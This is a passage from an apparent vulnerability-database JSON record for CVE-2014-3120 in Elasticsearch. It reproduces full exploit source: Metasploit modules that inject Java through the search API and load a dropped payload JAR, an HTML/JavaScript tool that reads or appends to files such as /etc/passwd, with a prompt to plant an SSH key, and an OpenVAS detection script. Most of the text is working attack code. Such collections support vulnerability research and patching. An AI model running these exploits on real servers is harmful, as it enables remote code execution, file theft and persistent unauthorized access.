prior to 1.2.0. The bug is found in the\r\n REST API, which requires no authentication or authorization, where the search\r\n function allows dynamic scripts execution, and can be used for remote attackers\r\n to execute arbitrary Java code. This module has been tested successfully on\r\n ElasticSearch 1.1.1 on Ubuntu Server 12.04 and Windows XP SP3.\r\n },\r\n 'Author' =>\r\n [\r\n 'Alex Brasetvik', # Vulnerability discovery\r\n 'Bouke van der Bijl', # Vulnerability discovery and PoC\r\n 'juan vazquez' # Metasploit module\r\n ],\r\n 'License' => MSF_LICENSE,\r\n 'References' =>\r\n [\r\n ['CVE', '2014-3120'],\r\n ['OSVDB', '106949'],\r\n ['EDB', '33370'],\r\n ['URL', 'http://bouk.co/blog/elasticsearch-rce/'],\r\n ['URL', 'https://www.found.no/foundation/elasticsearch-security/#staying-safe-while-developing-with-elasticsearch']\r\n ],\r\n 'Platform' => 'java',\r\n 'Arch' => ARCH_JAVA,\r\n 'Targets' =>\r\n [\r\n [ 'ElasticSearch 1.1.1 / Automatic', { } ]\r\n ],\r\n 'DisclosureDate' => 'Dec 09 2013',\r\n 'DefaultTarget' => 0))\r\n \r\n register_options(\r\n [\r\n Opt::RPORT(9200),\r\n OptString.new('TARGETURI', [ true, 'The path to the ElasticSearch REST API', \"/\"]),\r\n OptString.new(\"WritableDir\", [ true, \"A directory where we can write files (only for *nix environments)\", \"/tmp\" ])\r\n ], self.class)\r\n end\r\n \r\n def check\r\n result = Exploit::CheckCode::Safe\r\n \r\n if vulnerable?\r\n result = Exploit::CheckCode::Vulnerable\r\n end\r\n \r\n result\r\n end\r\n \r\n def exploit\r\n print_status(\"#{peer} - Trying to execute arbitrary Java..\")\r\n unless vulnerable?\r\n fail_with(Failure::Unknown, \"#{peer} - Java has not been executed, aborting...\")\r\n end\r\n \r\n print_status(\"#{peer} - Asking remote OS...\")\r\n res = execute(java_os)\r\n result = parse_result(res)\r\n if result.nil?\r\n fail_with(Failure::Unknown, \"#{peer} - Could not get remote OS...\")\r\n else\r\n print_good(\"#{peer} - OS #{result} found\")\r\n end\r\n \r\n jar_file = \"\"\r\n if result =~ /win/i\r\n print_status(\"#{peer} - Asking TEMP path\")\r\n res = execute(java_tmp_dir)\r\n result = parse_result(res)\r\n if result.nil?\r\n fail_with(Failure::Unknown, \"#{peer} - Could not get TEMP path...\")\r\n else\r\n print_good(\"#{peer} - TEMP path found on #{result}\")\r\n end\r\n jar_file = \"#{result}#{rand_text_alpha(3 + rand(4))}.jar\"\r\n else\r\n jar_file = File.join(datastore['WritableDir'], \"#{rand_text_alpha(3 + rand(4))}.jar\")\r\n end\r\n \r\n register_file_for_cleanup(jar_file)\r\n execute(java_payload(jar_file))\r\n end\r\n \r\n def vulnerable?\r\n addend_one = rand_text_numeric(rand(3) + 1).to_i\r\n addend_two = rand_text_numeric(rand(3) + 1).to_i\r\n sum = addend_one + addend_two\r\n \r\n java = java_sum([addend_one, addend_two])\r\n res = execute(java)\r\n result = parse_result(res)\r\n \r\n if result.nil?\r\n return false\r\n else\r\n result.to_i == sum\r\n end\r\n end\r\n \r\n def parse_result(res)\r\n unless res && res.code == 200 && res.body\r\n return nil\r\n end\r\n \r\n begin\r\n json = JSON.parse(res.body.to_s)\r\n rescue JSON::ParserError\r\n return nil\r\n end\r\n \r\n begin\r\n result = json['hits']['hits'][0]['fields']['msf_result'][0]\r\n rescue\r\n return nil\r\n end\r\n \r\n result\r\n end\r\n \r\n def java_sum(summands)\r\n source = <<-EOF\r\n#{summands.join(\" + \")}\r\n EOF\r\n \r\n source\r\n end\r\n \r\n def to_java_byte_array(str)\r\n buff = \"byte[] buf = new byte[#{str.length}];\\n\"\r\n i = 0\r\n str.unpack('C*').each do |c|\r\n buff << \"buf[#{i}] = #{c};\\n\"\r\n i = i + 1\r\n end\r\n \r\n buff\r\n end\r\n \r\n def java_os\r\n \"System.getProperty(\\\"os.name\\\")\"\r\n end\r\n \r\n def java_tmp_dir\r\n \"System.getProperty(\\\"java.io.tmpdir\\\");\"\r\n end\r\n \r\n \r\n def java_payload(file_name)\r\n source = <<-EOF\r\nimport java.io.*;\r\nimport java.lang.*;\r\nimport java.net.*;\r\n \r\n#{to_java_byte_array(payload.encoded_jar.pack)}\r\nFile f = new File('#{file_name.gsub(/\\\\/, \"/\")}');\r\nFileOutputStream fs = new FileOutputStream(f);\r\nbs = new BufferedOutputStream(fs);\r\nbs.write(buf);\r\nbs.close();\r\nbs = null;\r\nURL u = f.toURI().toURL();\r\nURLClassLoader cl = new URLClassLoader(new java.net.URL[]{u});\r\nClass c = cl.loadClass('metasploit.Payload');\r\nc.main(null);\r\n EOF\r\n \r\n source\r\n end\r\n \r\n def execute(java)\r\n payload = {\r\n \"size\" => 1,\r\n \"query\" => {\r\n \"filtered\" => {\r\n \"query\" => {\r\n \"match_all\" => {}\r\n }\r\n }\r\n },\r\n \"script_fields\" => {\r\n \"msf_result\" => {\r\n \"script\" => java\r\n }\r\n }\r\n }\r\n \r\n res = send_request_cgi({\r\n 'uri' => normalize_uri(target_uri.path.to_s, \"_search\"),\r\n 'method' => 'POST',\r\n 'data' => JSON.generate(payload)\r\n })\r\n \r\n return res\r\n end\r\n \r\nend\n\n# 0day.today [2018-02-20] #", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://0day.today/exploit/22300"}, {"lastseen": "2018-01-08T13:16:09", "bulletinFamily": "exploit", "description": "Exploit for multiple platform in category web applications", "modified": "2014-05-15T00:00:00", "published": "2014-05-15T00:00:00", "id": "1337DAY-ID-22252", "href": "https://0day.today/exploit/description/22252", "type": "zdt", "title": "ElasticSearch Remote Code Execution Exploit", "sourceData": "<!--\r\n##CVE-2014-3120 Elastic Search Remote Code Execution\r\n \r\nThis project demonstrates the CVE-2014-3120 vulnerability/misconfiguration. It allows you to read from and append to files on the system hosting ES, provided the user running ES has access to them.\r\n \r\n###Notes\r\n \r\nThis does not require a web server. Save it locally and run it from a browser.\r\n \r\nDiscovery and vuln publishing credit goes to: @BvdBijl - http://bouk.co/blog/elasticsearch-rce/\r\n-->\r\n \r\n<html><head><meta http-equiv=\"Content-Type\" content=\"text/html; charset=UTF-8\">\r\n<!-- Latest compiled and minified CSS -->\r\n<link href=\"http://netdna.bootstrapcdn.com/bootstrap/3.1.1/css/bootstrap.min.css\" rel=\"stylesheet\">\r\n \r\n<!-- Optional theme -->\r\n<link href=\"http://netdna.bootstrapcdn.com/bootstrap/3.1.1/css/bootstrap-theme.min.css\" rel=\"stylesheet\">\r\n<style>\r\nbody {\r\n padding-top: 50px;\r\n}\r\n.starter-template {\r\n padding: 40px 15px;\r\n text-align: center;\r\n}\r\n \r\n</style>\r\n</head>\r\n \r\n \r\n<script src=\"http://code.jquery.com/jquery-1.11.1.min.js\"></script>\r\n<script>\r\nfunction es_inject() {\r\n \r\nvar read_file;\r\nvar write_file;\r\n \r\nread_file = function(filename) {\r\n return (\"import java.util.*;\\nimport java.io.*;\\nnew Scanner(new File(\\\"\" + filename + \"\\\")).useDelimiter(\\\"\\\\\\\\Z\\\").next();\");\r\n};\r\n \r\nwrite_file = function(filename) {\r\n return (\"import java.util.*;\\nimport java.io.*;\\nPrintWriter writer = new PrintWriter(new BufferedWriter(new FileWriter(\\\"\" + filename + \"\\\", true)));\\nwriter.println(\\\"\" + document.getElementById(\"element_2\").value + \"\\\");\\nwriter.close();\");\r\n};\r\n \r\n$(function() {\r\n var payload, filename, files, host, _i, _len;\r\n files = [document.getElementById(\"element_3\").value];\r\n payload = {\r\n \"size\": 1,\r\n \"query\": {\r\n \"filtered\": {\r\n \"query\": {\r\n \"match_all\": {}\r\n }\r\n }\r\n },\r\n \"script_fields\": {}\r\n };\r\n if (document.getElementById(\"element_4\").checked) {\r\n for (_i = 0, _len = files.length; _i < _len; _i++) {\r\n filename = files[_i];\r\n payload[\"script_fields\"][filename] = {\r\n \"script\": write_file(filename)\r\n };\r\n }\r\n } else {\r\n for (_i = 0, _len = files.length; _i < _len; _i++) {\r\n filename = files[_i];\r\n payload[\"script_fields\"][filename] = {\r\n \"script\": read_file(filename)\r\n };\r\n }\r\n } \r\n \r\n \r\n $.getJSON(\"http://\" + document.getElementById(\"element_1\").value + \":9200/_search?source=\" + (encodeURIComponent(JSON.stringify(payload))) + \"&callback=?\", function(data) {\r\n var content, contents, hit, _j, _len1, _ref, _results;\r\n console.log(data);\r\n _ref = data[\"hits\"][\"hits\"];\r\n _results = [];\r\n for (_j = 0, _len1 = _ref.length; _j < _len1; _j++) {\r\n hit = _ref[_j];\r\n _results.push((function() {\r\n var _k, _len2, _ref1;\r\n _ref1 = hit[\"fields\"];\r\n for (filename in _ref1) {\r\n contents = _ref1[filename];\r\n document.getElementById(\"script_results\").innerHTML += (\"<h2>\" + filename + \"</h2>\");\r\n for (_k = 0, _len2 = contents.length; _k < _len2; _k++) {\r\n content = contents[_k];\r\n document.getElementById(\"script_results\").innerHTML += (content);\r\n }\r\n document.getElementById(\"script_results\").innerHTML += (\"<hr>\");\r\n //document.getElementById(\"script_results\").innerHTML += (document.getElementById(\"element_4\").checked);\r\n }\r\n })());\r\n }\r\n return _results;\r\n });\r\n});\r\n};\r\n//es_inject();\r\n</script>\r\n<body>\r\n \r\n <div class=\"navbar navbar-inverse navbar-fixed-top\" role=\"navigation\">\r\n <div class=\"container\">\r\n <div class=\"navbar-header\">\r\n <button type=\"button\" class=\"navbar-toggle\" data-toggle=\"collapse\" data-target=\".navbar-collapse\">\r\n <span class=\"sr-only\">Toggle navigation</span>\r\n <span class=\"icon-bar\"></span>\r\n <span class=\"icon-bar\"></span>\r\n <span class=\"icon-bar\"></span>\r\n </button>\r\n <a class=\"navbar-brand\" href=\"#\">Elastic Inject</a>\r\n </div>\r\n \r\n </div>\r\n </div>\r\n \r\n <div class=\"container\">\r\n \r\n <div class=\"starter-template\">\r\n <h2>CVE-2014-3120 Elastic Search Remote Code Execution</h2>\r\n <p class=\"lead\">This will read and write files from an ES instance vulnerable to CVE-2014-3120.<br> This is for demonstration purposes only.</p>\r\n </div>\r\n <div class=\"col-md-8\">\r\n <!-- <form id=\"ES_Inject\" action=\"\" method=\"\"> /-->\r\n <label for=\"element_1\">ES_IP_Address: </label><br/>\r\n <input id=\"element_1\" name=\"element_1\" class=\"element text medium\" type=\"text\" maxlength=\"255\" value=\"127.0.0.1\"/> <br/>\r\n <label for=\"element_3\">File to read/append to: </label><br/>\r\n <input id=\"element_3\" name=\"element_3\" class=\"element text medium\" type=\"text\" maxlength=\"255\" value=\"/etc/passwd\"/> <br/>\r\n <label class=\"description\" for=\"element_2\">Content to append: </label><br/>\r\n <textarea id=\"element_2\" name=\"element_2\" class=\"element textarea large\">YOUR_SSH_PUBLIC_KEY or SOMETHING</textarea> <br/>\r\n <!-- <input id=\"element_4\" type=\"radio\" name=\"es_action\" value=\"read\" checked>READ<br/> /-->\r\n <input id=\"element_4\" type=\"checkbox\" name=\"es_action\" value=\"write\">WRITE<br/>\r\n <!-- <input id=\"saveForm\" class=\"button_text\" type=\"submit\" name=\"submit\" value=\"Submit\" onClick=\"es_inject();\"/> /-->\r\n <button onclick=\"es_inject();\">Click me</button>\r\n <!-- </form> /-->\r\n<h3>Your file contents should appear below if a read is successful. </h3>\r\n<div id=\"script_results\">\r\n \r\n</div>\r\n </div>\r\n<div class=\"col-md-8\">\r\n Original vulnerability discovered by <a href=\"https://twitter.com/bvdbijl\"> @BvdBijl</a> - <a href=\"http://bouk.co/blog/elasticsearch-rce/\">http://bouk.co/blog/elasticsearch-rce/</a>\r\n</div>\r\n </div><!-- /.container -->\r\n <script src=\"//netdna.bootstrapcdn.com/bootstrap/3.1.1/js/bootstrap.min.js\"></script>\r\n</body></html>\n\n# 0day.today [2018-01-08] #", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://0day.today/exploit/22252"}], "metasploit": [{"lastseen": "2020-02-15T05:20:21", "bulletinFamily": "exploit", "description": "This module exploits a remote command execution (RCE) vulnerability in ElasticSearch, exploitable by default on ElasticSearch prior to 1.2.0. The bug is found in the REST API, which does not require authentication, where the search function allows dynamic scripts execution. It can be used for remote attackers to execute arbitrary Java code. This module has been tested successfully on ElasticSearch 1.1.1 on Ubuntu Server 12.04 and Windows XP SP3.\n", "modified": "2017-07-24T13:26:21", "published": "2014-05-27T23:01:16", "id": "MSF:EXPLOIT/MULTI/ELASTICSEARCH/SCRIPT_MVEL_RCE", "href": "", "type": "metasploit", "title": "ElasticSearch Dynamic Script Arbitrary Java Execution", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::FileDropper\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'ElasticSearch Dynamic Script Arbitrary Java Execution',\n 'Description' => %q{\n This module exploits a remote command execution (RCE) vulnerability in ElasticSearch,\n exploitable by default on ElasticSearch prior to 1.2.0. The bug is found in the\n REST API, which does not require authentication, where the search\n function allows dynamic scripts execution. It can be used for remote attackers\n to execute arbitrary Java code. This module has been tested successfully on\n ElasticSearch 1.1.1 on Ubuntu Server 12.04 and Windows XP SP3.\n },\n 'Author' =>\n [\n 'Alex Brasetvik', # Vulnerability discovery\n 'Bouke van der Bijl', # Vulnerability discovery and PoC\n 'juan vazquez' # Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n ['CVE', '2014-3120'],\n ['OSVDB', '106949'],\n ['EDB', '33370'],\n ['URL', 'http://bouk.co/blog/elasticsearch-rce/'],\n ['URL', 'https://www.found.no/foundation/elasticsearch-security/#staying-safe-while-developing-with-elasticsearch']\n ],\n 'Platform' => 'java',\n 'Arch' => ARCH_JAVA,\n 'Targets' =>\n [\n [ 'ElasticSearch 1.1.1 / Automatic', { } ]\n ],\n 'DisclosureDate' => 'Dec 09 2013',\n 'DefaultTarget' => 0))\n\n register_options(\n [\n Opt::RPORT(9200),\n OptString.new('TARGETURI', [ true, 'The path to the ElasticSearch REST API', \"/\"]),\n OptString.new(\"WritableDir\", [ true, \"A directory where we can write files (only for *nix environments)\", \"/tmp\" ])\n ])\n end\n\n def check\n result = Exploit::CheckCode::Safe\n\n if vulnerable?\n result = Exploit::CheckCode::Vulnerable\n end\n\n result\n end\n\n def exploit\n print_status(\"Trying to execute arbitrary Java...\")\n unless vulnerable?\n fail_with(Failure::Unknown, \"#{peer} - Java has not been executed, aborting...\")\n end\n\n print_status(\"Discovering remote OS...\")\n res = execute(java_os)\n result = parse_result(res)\n if result.nil?\n fail_with(Failure::Unknown, \"#{peer} - Could not identify remote OS...\")\n else\n # TODO: It'd be nice to report_host() with this info.\n print_good(\"Remote OS is '#{result}'\")\n end\n\n jar_file = \"\"\n if result =~ /win/i\n print_status(\"Discovering TEMP path\")\n res = execute(java_tmp_dir)\n result = parse_result(res)\n if result.nil?\n fail_with(Failure::Unknown, \"#{peer} - Could not identify TEMP path...\")\n else\n print_good(\"TEMP path identified: '#{result}'\")\n end\n jar_file = \"#{result}#{rand_text_alpha(3 + rand(4))}.jar\"\n else\n jar_file = File.join(datastore['WritableDir'], \"#{rand_text_alpha(3 + rand(4))}.jar\")\n end\n\n register_file_for_cleanup(jar_file)\n execute(java_payload(jar_file))\n end\n\n def vulnerable?\n java = 'System.getProperty(\"java.class.path\")'\n\n vprint_status(\"Trying to execute 'System.getProperty(\\\"java.version\\\")'...\")\n res = execute(java)\n result = parse_result(res)\n\n if result.nil?\n vprint_status(\"No results for the Java test\")\n return false\n elsif result =~ /elasticsearch/\n vprint_status(\"Answer to Java test: #{result}\")\n return true\n else\n vprint_status(\"Answer to Java test: #{result}\")\n return false\n end\n end\n\n def parse_result(res)\n unless res\n vprint_error(\"#{peer} no response\")\n return nil\n end\n\n unless res.code == 200 && res.body\n vprint_error(\"#{peer} responded with HTTP code #{res.code} (with#{res.body ? '' : 'out'} a body)\")\n return nil\n end\n\n begin\n json = JSON.parse(res.body.to_s)\n rescue JSON::ParserError\n return nil\n end\n\n begin\n result = json['hits']['hits'][0]['fields']['msf_result']\n rescue\n return nil\n end\n\n result.is_a?(::Array) ? result.first : result\n end\n\n def to_java_byte_array(str)\n buff = \"byte[] buf = new byte[#{str.length}];\\n\"\n i = 0\n str.unpack('C*').each do |c|\n buff << \"buf[#{i}] = #{c};\\n\"\n i = i + 1\n end\n\n buff\n end\n\n def java_os\n \"System.getProperty(\\\"os.name\\\")\"\n end\n\n def java_tmp_dir\n \"System.getProperty(\\\"java.io.tmpdir\\\");\"\n end\n\n\n def java_payload(file_name)\n source = <<-EOF\nimport java.io.*;\nimport java.lang.*;\nimport java.net.*;\n\n#{to_java_byte_array(payload.encoded_jar.pack)}\nFile f = new File('#{file_name.gsub(/\\\\/, \"/\")}');\nFileOutputStream fs = new FileOutputStream(f);\nbs = new BufferedOutputStream(fs);\nbs.write(buf);\nbs.close();\nbs = null;\nURL u = f.toURI().toURL();\nURLClassLoader cl = new URLClassLoader(new java.net.URL[]{u});\nClass c = cl.loadClass('metasploit.Payload');\nc.main(null);\n EOF\n\n source\n end\n\n def execute(java)\n payload = {\n \"size\" => 1,\n \"query\" => {\n \"filtered\" => {\n \"query\" => {\n \"match_all\" => {}\n }\n }\n },\n \"script_fields\" => {\n \"msf_result\" => {\n \"script\" => java\n }\n }\n }\n\n res = send_request_cgi({\n 'uri' => normalize_uri(target_uri.path.to_s, \"_search\"),\n 'method' => 'POST',\n 'data' => JSON.generate(payload)\n })\n\n return res\n end\nend\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/multi/elasticsearch/script_mvel_rce.rb"}], "openvas": [{"lastseen": "2019-05-29T18:37:37", "bulletinFamily": "scanner", "description": "Elasticsearch is prone to a remote-code-execution vulnerability.", "modified": "2018-08-08T00:00:00", "published": "2014-05-22T00:00:00", "id": "OPENVAS:1361412562310105032", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310105032", "title": "Elastisearch Remote Code Execution Vulnerability", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_elastisearch_code_execution_05_14.nasl 10833 2018-08-08 10:35:26Z cfischer $\n#\n# Elastisearch Remote Code Execution Vulnerability\n#\n# Authors:\n# Michael Meyer <michael.meyer@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2014 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:elasticsearch:elasticsearch\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.105032\");\n script_cve_id(\"CVE-2014-3120\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_version(\"$Revision: 10833 $\");\n script_name(\"Elastisearch Remote Code Execution Vulnerability\");\n script_xref(name:\"URL\", value:\"http://bouk.co/blog/elasticsearch-rce/\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-08-08 12:35:26 +0200 (Wed, 08 Aug 2018) $\");\n script_tag(name:\"creation_date\", value:\"2014-05-22 15:28:00 +0200 (Thu, 22 May 2014)\");\n script_category(ACT_ATTACK);\n script_family(\"Web application abuses\");\n script_copyright(\"This script is Copyright (C) 2014 Greenbone Networks GmbH\");\n script_dependencies(\"gb_elastsearch_detect.nasl\", \"os_detection.nasl\");\n script_require_ports(\"Services/www\", 9200);\n script_mandatory_keys(\"elasticsearch/installed\");\n\n script_tag(name:\"impact\", value:\"An attacker can exploit this issue to execute arbitrary code\");\n\n script_tag(name:\"vuldetect\", value:\"Send a special crafted HTTP GET request and check the response\");\n\n script_tag(name:\"insight\", value:\"Elasticsearch has a flaw in its default configuration which makes\n it possible for any webpage to execute arbitrary code on visitors with Elasticsearch installed.\");\n\n script_tag(name:\"solution\", value:\"Ask the vendor for an update or disable 'dynamic scripting'\");\n\n script_tag(name:\"summary\", value:\"Elasticsearch is prone to a remote-code-execution vulnerability.\");\n\n script_tag(name:\"affected\", value:\"Elasticsearch < 1.2\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n\n exit(0);\n}\n\ninclude(\"misc_func.inc\");\ninclude(\"host_details.inc\");\ninclude(\"http_func.inc\");\n\nif( ! port = get_app_port( cpe:CPE ) ) exit( 0 );\nif( ! dir = get_app_location( cpe:CPE, port:port ) ) exit( 0 ); # To have a reference to the Detection-NVT\n\nfiles = traversal_files();\n\nforeach file ( keys( files ) )\n{\n lf = str_replace( string:files[file], find:\"\\\\\", replace:\"/\");\n lf = str_replace( string:files[file], find:\"/\", replace:\"%2F\");\n\n ex = '%7B%22size%22%3A1%2C%22query%22%3A%7B%22filtered%22%3A%7B%22query%22%3A%7B%22' +\n 'match_all%22%3A%7B%7D%7D%7D%7D%2C%22script_fields%22%3A%7B%22OpenVAS%22%3A%7B' +\n '%22script%22%3A%22import%20java.util.*%3B%5Cnimport%20java.io.*%3B%5Cnnew%20' +\n 'Scanner(new%20File(%5C%22%2F' + lf + '%5C%22)).useDelimiter(%5C%22%5C%5C%5C' +\n '%5CZ%5C%22).next()%3B%22%7D%7D%7D';\n\n url = '/_search?source=' + ex + '&callback=?';\n\n req = http_get( item:url, port:port);\n buf = http_send_recv( port:port, data:req, bodyonly:FALSE );\n\n if( \"OpenVAS\" >< buf && egrep( pattern:file, string: buf ) )\n {\n report = report_vuln_url( port:port, url:url );\n security_message( port:port, data:report );\n exit( 0 );\n }\n\n}\n\nexit( 99 );\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "exploitdb": [{"lastseen": "2016-02-03T19:02:44", "bulletinFamily": "exploit", "description": "ElasticSearch Remote Code Execution. CVE-2014-3120. Webapps exploits for multiple platform", "modified": "2014-05-15T00:00:00", "published": "2014-05-15T00:00:00", "id": "EDB-ID:33370", "href": "https://www.exploit-db.com/exploits/33370/", "type": "exploitdb", "title": "ElasticSearch Remote Code Execution", "sourceData": "<!--\r\n##CVE-2014-3120 Elastic Search Remote Code Execution\r\n\r\nThis project demonstrates the CVE-2014-3120 vulnerability/misconfiguration. It allows you to read from and append to files on the system hosting ES, provided the user running ES has access to them.\r\n\r\n###Notes\r\n\r\nThis does not require a web server. Save it locally and run it from a browser.\r\n\r\nDiscovery and vuln publishing credit goes to: @BvdBijl - http://bouk.co/blog/elasticsearch-rce/\r\n-->\r\n\r\n<html><head><meta http-equiv=\"Content-Type\" content=\"text/html; charset=UTF-8\">\r\n<!-- Latest compiled and minified CSS -->\r\n<link href=\"http://netdna.bootstrapcdn.com/bootstrap/3.1.1/css/bootstrap.min.css\" rel=\"stylesheet\">\r\n\r\n<!-- Optional theme -->\r\n<link href=\"http://netdna.bootstrapcdn.com/bootstrap/3.1.1/css/bootstrap-theme.min.css\" rel=\"stylesheet\">\r\n<style>\r\nbody {\r\n padding-top: 50px;\r\n}\r\n.starter-template {\r\n padding: 40px 15px;\r\n text-align: center;\r\n}\r\n\r\n</style>\r\n</head>\r\n\r\n\r\n<script src=\"http://code.jquery.com/jquery-1.11.1.min.js\"></script>\r\n<script>\r\nfunction es_inject() {\r\n\r\nvar read_file;\r\nvar write_file;\r\n\r\nread_file = function(filename) {\r\n return (\"import java.util.*;\\nimport java.io.*;\\nnew Scanner(new File(\\\"\" + filename + \"\\\")).useDelimiter(\\\"\\\\\\\\Z\\\").next();\");\r\n};\r\n\r\nwrite_file = function(filename) {\r\n return (\"import java.util.*;\\nimport java.io.*;\\nPrintWriter writer = new PrintWriter(new BufferedWriter(new FileWriter(\\\"\" + filename + \"\\\", true)));\\nwriter.println(\\\"\" + document.getElementById(\"element_2\").value + \"\\\");\\nwriter.close();\");\r\n};\r\n\r\n$(function() {\r\n var payload, filename, files, host, _i, _len;\r\n files = [document.getElementById(\"element_3\").value];\r\n payload = {\r\n \"size\": 1,\r\n \"query\": {\r\n \"filtered\": {\r\n \"query\": {\r\n \"match_all\": {}\r\n }\r\n }\r\n },\r\n \"script_fields\": {}\r\n };\r\n if (document.getElementById(\"element_4\").checked) {\r\n for (_i = 0, _len = files.length; _i < _len; _i++) {\r\n filename = files[_i];\r\n payload[\"script_fields\"][filename] = {\r\n \"script\": write_file(filename)\r\n };\r\n }\r\n } else {\r\n for (_i = 0, _len = files.length; _i < _len; _i++) {\r\n filename = files[_i];\r\n payload[\"script_fields\"][filename] = {\r\n \"script\": read_file(filename)\r\n };\r\n }\r\n } \r\n\r\n\r\n $.getJSON(\"http://\" + document.getElementById(\"element_1\").value + \":9200/_search?source=\" + (encodeURIComponent(JSON.stringify(payload))) + \"&callback=?\", function(data) {\r\n var content, contents, hit, _j, _len1, _ref, _results;\r\n console.log(data);\r\n _ref = data[\"hits\"][\"hits\"];\r\n _results = [];\r\n for (_j = 0, _len1 = _ref.length; _j < _len1; _j++) {\r\n hit = _ref[_j];\r\n _results.push((function() {\r\n var _k, _len2, _ref1;\r\n _ref1 = hit[\"fields\"];\r\n for (filename in _ref1) {\r\n contents = _ref1[filename];\r\n document.getElementById(\"script_results\").innerHTML += (\"<h2>\" + filename + \"</h2>\");\r\n for (_k = 0, _len2 = contents.length; _k < _len2; _k++) {\r\n content = contents[_k];\r\n document.getElementById(\"script_results\").innerHTML += (content);\r\n }\r\n document.getElementById(\"script_results\").innerHTML += (\"<hr>\");\r\n //document.getElementById(\"script_results\").innerHTML += (document.getElementById(\"element_4\").checked);\r\n }\r\n })());\r\n }\r\n return _results;\r\n });\r\n});\r\n};\r\n//es_inject();\r\n</script>\r\n<body>\r\n\r\n <div class=\"navbar navbar-inverse navbar-fixed-top\" role=\"navigation\">\r\n <div class=\"container\">\r\n <div class=\"navbar-header\">\r\n <button type=\"button\" class=\"navbar-toggle\" data-toggle=\"collapse\" data-target=\".navbar-collapse\">\r\n <span class=\"sr-only\">Toggle navigation</span>\r\n <span class=\"icon-bar\"></span>\r\n <span class=\"icon-bar\"></span>\r\n <span class=\"icon-bar\"></span>\r\n </button>\r\n <a class=\"navbar-brand\" href=\"#\">Elastic Inject</a>\r\n </div>\r\n\r\n </div>\r\n </div>\r\n\r\n <div class=\"container\">\r\n\r\n <div class=\"starter-template\">\r\n <h2>CVE-2014-3120 Elastic Search Remote Code Execution</h2>\r\n <p class=\"lead\">This will read and write files from an ES instance vulnerable to CVE-2014-3120.<br> This is for demonstration purposes only.</p>\r\n </div>\r\n <div class=\"col-md-8\">\r\n <!-- <form id=\"ES_Inject\" action=\"\" method=\"\"> /-->\r\n <label for=\"element_1\">ES_IP_Address: </label><br/>\r\n <input id=\"element_1\" name=\"element_1\" class=\"element text medium\" type=\"text\" maxlength=\"255\" value=\"127.0.0.1\"/> <br/>\r\n <label for=\"element_3\">File to read/append to: </label><br/>\r\n <input id=\"element_3\" name=\"element_3\" class=\"element text medium\" type=\"text\" maxlength=\"255\" value=\"/etc/passwd\"/> <br/>\r\n <label class=\"description\" for=\"element_2\">Content to append: </label><br/>\r\n <textarea id=\"element_2\" name=\"element_2\" class=\"element textarea large\">YOUR_SSH_PUBLIC_KEY or SOMETHING</textarea> <br/>\r\n <!-- <input id=\"element_4\" type=\"radio\" name=\"es_action\" value=\"read\" checked>READ<br/> /-->\r\n <input id=\"element_4\" type=\"checkbox\" name=\"es_action\" value=\"write\">WRITE<br/>\r\n <!-- <input id=\"saveForm\" class=\"button_text\" type=\"submit\" name=\"submit\" value=\"Submit\" onClick=\"es_inject();\"/> /-->\r\n <button onclick=\"es_inject();\">Click me</button>\r\n <!-- </form> /-->\r\n<h3>Your file contents should appear below if a read is successful. </h3>\r\n<div id=\"script_results\">\r\n\r\n</div>\r\n </div>\r\n<div class=\"col-md-8\">\r\n Original vulnerability discovered by <a href=\"https://twitter.com/bvdbijl\"> @BvdBijl</a> - <a href=\"http://bouk.co/blog/elasticsearch-rce/\">http://bouk.co/blog/elasticsearch-rce/</a>\r\n</div>\r\n </div><!-- /.container -->\r\n <script src=\"//netdna.bootstrapcdn.com/bootstrap/3.1.1/js/bootstrap.min.js\"></script>\r\n</body></html>", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/33370/"}, {"lastseen": "2016-02-03T19:29:57", "bulletinFamily": "exploit", "description": "ElasticSearch Dynamic Script Arbitrary Java Execution. CVE-2014-3120. Remote exploit for java platform", "modified": "2014-05-30T00:00:00", "published": "2014-05-30T00:00:00", "id": "EDB-ID:33588", "href": "https://www.exploit-db.com/exploits/33588/", "type": "exploitdb", "title": "ElasticSearch Dynamic Script Arbitrary Java Execution", "sourceData": "##\r\n# This module requires Metasploit: http//metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass 